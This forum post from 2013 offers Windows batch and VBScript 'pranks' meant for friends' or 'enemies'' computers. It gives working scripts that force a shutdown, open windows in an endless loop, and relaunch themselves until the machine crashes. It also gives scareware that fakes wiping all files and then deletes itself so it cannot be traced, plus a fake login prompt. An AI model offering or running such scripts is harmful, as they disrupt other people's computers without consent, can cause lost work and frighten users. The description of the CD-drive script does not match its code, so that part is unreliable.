Notepad Trick to Shutdown Computer Forcefully and a few other things

Oldzub Jul 12, 2013

  1. Oldzub

    Oldzub Hero Of XPG
    0/47

    Joined:
    Dec 27, 2012
    Messages:
    855
    Likes Received:
    107
    Trophy Points:
    0
    Gender:
    Male
    Console:
    Xbox
    Notepad Trick to Shutdown Computer Forcefully
    Open Notepad.
    Paste the following code in it:
    @echo off

    msg * Shutdown computer.

    shutdown -c “Sleep Tight” -s



    Now Tricks 4 U To Try On Your ENEMIES !!!!!!!!!!!!!!!!!!!!
    1.Prank Name: File.bat
    Description: This prank will create and open a file that they cannot close, minimize, or maximize without closing the command prompt behind it.

    1. Go into Notepad

    2. Type the text below.

    @echo off
    md hello
    :A
    start hello
    goto A

    3. Save it as file.bat


    Prank Name: Delete.bat
    Description: This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable.

    1. Go into Notepad.
    2. Enter the text below into notepad
    @echo off
    echo do you want to delete all of your computer data? (y/n)
    pause >nul
    echo Do not exit out of the screen or all computer data will be deleted.
    ping localhost -n 2 > nul
    echo Are you sure you want to delete all computer data? (y/n)
    pause >nul
    echo deleting all data...
    echo.
    echo.
    pause localhost -n 2 > nul
    dir /s
    echo.
    echo.
    ping localhost -n 2 > nul
    cls
    echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n)
    pause
    echo.
    echo.
    ping localhost -n 1 > nul
    cls
    dir /s
    echo.
    echo.
    ping localhost -n 2 >nul
    cls
    echo all data has been deleted..
    pause
    del "c:delete.bat"

    3. Save this as delete.bat (MUST NAME IT THIS!)

    Prank Name: virus.bat
    Description: The prank will open and unlimited amount of command prompts until the computer crashes or you manually crash it.

    1. Go into Notepad
    2. type
    start virus.bat
    virus.bat (exactly like that!)


    3. Save it as virus.bat (must be .bat)


    4.Prank Name: shutdown.bat
    Description: This makes your friend think that his/her computer has a virus then their computer shuts down.
    1. Go to notepad and type:
    @echo off
    :A
    cls
    echo Do you wanna crash your computer? (y/n)
    pause
    echo Are you sure? (y/n)
    pause
    echo your computer will crash when the time reaches zero.
    pause
    msg * Your computer will crash in...
    msg * 5
    msg * 4
    msg * 3
    msg * 2
    msg * 1
    msg * Good-Bye
    msg * You have been pwned! :)
    shutdown -s -t 00


    .Prank Name: up.bat
    Description: Shows a fake username and password entrance area then deletes it self
    1.Go into notepad and type:

    @echo off
    echo If the proper username and password is not entered all files will be deleted by this virus.
    echo Good Luck
    set/p\/name=username:
    set/p\/password=password:
    echo haha you got the username and password wrong
    pause
    echo Files are being deleted
    pause
    dir/s
    del "c:up.bat"

    3. Save it as up.bat (must be this!)


    Prank Name: CD Drive Open and close
    Description: This vbs file will continually open your CD drive


    1. Go into notepad

    2. Type the text below

    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
    3. Save it as cdopen.vbs



    Trick Make Your Computer Speak What You Type!!!!!!!!!!!!!!!!!!
    Picture
    1.Open Notepad and copy and paste the following code into it.
    Dim message, sapi
    message=InputBox(“What do you want me to say?”,”Speak to Me”)
    Set sapi=CreateObject(“sapi.spvoice”)
    sapi.Speak message
    2.Now save the notepad file with the name speak.vbs at your desktop.
    3.Now double click on speak.vbs Type in the box whatever you want your computer to speak for you.
    [​IMG]
    NOTE: In case if it displays an error message while opening, edit it with notepad and re-type all the quote marks (“)
     

Share This Page

Close